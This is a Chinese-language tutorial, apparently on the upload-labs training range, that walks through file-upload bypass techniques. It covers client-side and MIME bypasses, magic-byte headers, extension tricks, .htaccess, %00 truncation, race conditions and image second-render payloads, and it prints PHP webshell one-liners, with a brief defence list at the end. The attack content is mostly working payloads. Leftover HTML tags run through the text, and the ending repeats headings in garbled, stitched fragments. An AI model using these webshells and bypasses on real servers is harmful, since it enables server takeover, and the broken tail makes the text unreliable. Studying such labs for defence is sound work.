文件上传漏洞全面解析与实战指南<\/h1>

一、环境部署<\/h2>

使用Docker一键部署文件上传靶场环境：<\/p>

# 进入项目文件夹<\/span>
<\/span><\/span>cd upload-labs-docker
<\/span><\/span>
<\/span><\/span># 一键部署运行<\/span>
<\/span><\/span>docker-compose up -d
<\/span><\/span><\/code><\/pre>默认13个关卡运行在30001-30013端口，如需自定义端口可修改docker-compose.yml文件。<\/p>
二、前端验证绕过(JS校验)<\/h2>
检测方法<\/h3>

上传文件时未抓到数据包就提示文件类型不正确<\/li>
浏览器直接拦截上传请求<\/li>
<\/ul>
绕过方法<\/h3>
1. 抓包修改<\/h4>

将shell.php重命名为shell.png上传<\/li>
抓包时将文件名改回shell.php<\/li>
<\/ol>
2. 禁用JS<\/h4>
Chrome浏览器：<\/p>

审查元素 → Settings → Debugger<\/li>
勾选"Disable JavaScript"<\/li>
<\/ol>
3. 调试JS(技术展示)<\/h4>

审查元素下断点<\/li>
单步调试找到whitelist变量<\/li>
修改数组元素值<\/li>
放行数据包<\/li>
<\/ol>
三、MIME类型校验绕过<\/h2>
绕过方法<\/h3>
抓包修改Content-Type为合法类型：<\/p>

image\/png<\/li>
image\/jpeg<\/li>
image\/gif<\/li>
<\/ul>
四、文件头校验绕过<\/h2>
绕过方法<\/h3>

使用标准图马<\/li>
在文件开头添加合法文件头：

GIF文件：GIF89a<\/code><\/li>
PNG文件：‰PNG<\/code><\/li>
JPEG文件：ÿØÿà<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
五、黑名单缺陷绕过<\/h2>
1. 替换为空缺陷<\/h3>
缺陷代码示例：<\/p>
$file_name =<\/span> str_replace<\/span>($deny_ext,""<\/span>,$file_name);
<\/span><\/span><\/code><\/pre>绕过方法：<\/p>

使用嵌套后缀：shell.pphphp<\/code><\/li>
<\/ul>
2. 大小写绕过(Windows环境)<\/h3>
缺陷代码示例：<\/p>
$file_name =<\/span> str_ireplace<\/span>($deny_ext,""<\/span>,$file_name);
<\/span><\/span><\/code><\/pre>绕过方法：<\/p>

使用大小写混合：.PHp<\/code><\/li>
<\/ul>
六、黑名单扩展名绕过<\/h2>
Apache解析规则<\/h3>
默认解析为PHP的扩展名：<\/p>

phtml<\/li>
pht<\/li>
php<\/li>
php3<\/li>
php4<\/li>
php5<\/li>
<\/ul>
七、.htaccess文件攻击<\/h2>
攻击步骤<\/h3>

上传.htaccess文件：<\/li>
<\/ol>
AddType application\/x-httpd-php .png
<\/span><\/span><\/code><\/pre>
上传shell.png文件（实际为PHP代码）<\/li>
<\/ol>
八、00截断攻击<\/h2>
1. GET型00截断<\/h3>
利用条件：<\/p>

PHP版本<5.3.4<\/li>
magic_quotes_gpc=off<\/li>
<\/ul>
攻击方法：

在路径参数后添加%00：<\/p>
upload.php?path=shell.php%00
<\/code><\/pre>
2. POST型00截断<\/h3>
攻击方法：<\/p>

抓包在文件名后添加%00<\/li>
在Burp Suite中手动URL解码%00<\/li>
<\/ol>
九、条件竞争攻击<\/h2>
攻击步骤<\/h3>

上传包含以下代码的PHP文件：<\/li>
<\/ol>
<?<\/span>php<\/span> fputs<\/span>(fopen<\/span>('xiao.php'<\/span>,'w'<\/span>),'<?php eval($_REQUEST[1]);?>'<\/span>);?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
使用Burp Suite的Intruder模块：

无限爆破上传请求<\/li>
同时无限访问上传的文件<\/li>
<\/ul>
<\/li>
<\/ol>
十、move_uploaded_file缺陷利用<\/h2>
缺陷特性<\/h3>
当$img_path可控时，会忽略路径末尾的\/.<\/code><\/p>
攻击方法<\/h3>
构造路径如：<\/p>
upload\/shell.php\/.
<\/code><\/pre>
十一、二次渲染绕过<\/h2>
1. GIF文件绕过<\/h3>

对比渲染前后GIF文件<\/li>
在未变化部分插入PHP代码<\/li>
<\/ol>
2. PNG文件绕过<\/h3>
写入PLTE数据块<\/h4>

将PNG转换为索引颜色模式<\/li>
使用脚本插入payload：<\/li>
<\/ol>
python poc_png.py -p '<?php eval($_REQUEST[1]);?>'<\/span> -o gg_shell.png old.png
<\/span><\/span><\/code><\/pre>写入IDAT数据块<\/h4>
使用专用脚本生成包含payload的PNG：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>$p =<\/span> array<\/span>(0xa3<\/span>, 0x9f<\/span>, 0x67<\/span>, 0xf7<\/span>, 0x0e<\/span>, 0x93<\/span>, 0x1b<\/span>, 0x23<\/span>,...<\/span>);
<\/span><\/span>$img =<\/span> imagecreatetruecolor<\/span>(32<\/span>, 32<\/span>);
<\/span><\/span>\/\/ 生成代码...
<\/span><\/span><\/span><\/span>imagepng<\/span>($img,'.\/shell.png'<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>3. JPG文件绕过<\/h3>

使用专用脚本插入payload：<\/li>
<\/ol>
php jpg_payload.php input.jpg
<\/span><\/span><\/code><\/pre>
成功率技巧：

使用较大图片<\/li>
payload尽量简短<\/li>
白色背景图片成功率更高<\/li>
多次尝试<\/li>
<\/ul>
<\/li>
<\/ol>
推荐payload：<\/p>
<?<\/span>php<\/span> $_GET[0<\/span>]($_POST[1<\/span>]);?><\/span>
<\/span><\/span><\/span><\/code><\/pre>十二、代码审计绕过<\/h2>
漏洞代码分析<\/h3>
$file =<\/span> empty<\/span>($_POST['save_name'<\/span>]) ?<\/span> $_FILES['upload_file'<\/span>]['name'<\/span>] :<\/span> $_POST['save_name'<\/span>];
<\/span><\/span>if<\/span> (!<\/span>is_array<\/span>($file)) {
<\/span><\/span>    $file =<\/span> explode<\/span>('.'<\/span>, strtolower<\/span>($file));
<\/span><\/span>}
<\/span><\/span>$file_name =<\/span> reset<\/span>($file) .<\/span> '.'<\/span> .<\/span> $file[count<\/span>($file) -<\/span> 1<\/span>];
<\/span><\/span><\/code><\/pre>攻击方法<\/h3>
构造数组型save_name：<\/p>
save_name<\/span>[0<\/span>] =<\/span> "shell.php\/"<\/span>
<\/span><\/span>save_name<\/span>[2<\/span>] =<\/span> "png"<\/span>
<\/span><\/span><\/code><\/pre>最终生成路径：<\/p>
shell.php\/.
<\/code><\/pre>
利用move_uploaded_file特性绕过<\/p>
十三、防御建议<\/h2>

使用白名单而非黑名单<\/li>
文件重命名（避免用户控制文件名）<\/li>
上传目录设置为不可执行<\/li>
对文件内容严格校验<\/li>
及时更新PHP版本<\/li>
禁用危险函数（如system、eval等）<\/li>
设置文件大小限制<\/li>
使用随机生成的文件名<\/li>
对图片进行二次渲染处理<\/li>
设置严格的MIME类型检查<\/li>
<\/ol>
十四、总结<\/h2>
文件上传漏洞形式多样，防御需要多层次防护。本文涵盖了从基础的前端校验绕过到复杂的二次渲染绕过等13种攻击技术，是全面理解文件上传漏洞的实用指南。<\/p>

文件上传漏洞全面解析与实战指南<\/h1>

二、前端验证绕过(JS校验)<\/h2>

绕过方法<\/h3>

三、MIME类型校验绕过<\/h2>

四、文件头校验绕过<\/h2>

五、黑名单缺陷绕过<\/h2>

六、黑名单扩展名绕过<\/h2>

七、.htaccess文件攻击<\/h2>

八、00截断攻击<\/h2>

九、条件竞争攻击<\/h2>

十、move_uploaded_file缺陷利用<\/h2>

缺陷特性<\/h3> 当$img_path可控时，会忽略路径末尾的\/.<\/code><\/p>

十一、二次渲染绕过<\/h2>

2. PNG文件绕过<\/h3>

十二、代码审计绕过<\/h2>

十四、总结<\/h2> 文件上传漏洞形式多样，防御需要多层次防护。本文涵盖了从基础的前端校验绕过到复杂的二次渲染绕过等13种攻击技术，是全面理解文件上传漏洞的实用指南。<\/p>

缺陷特性<\/h3>
当$img_path可控时，会忽略路径末尾的`\/.<\/code><\/p>`

十四、总结<\/h2>
文件上传漏洞形式多样，防御需要多层次防护。本文涵盖了从基础的前端校验绕过到复杂的二次渲染绕过等13种攻击技术，是全面理解文件上传漏洞的实用指南。<\/p>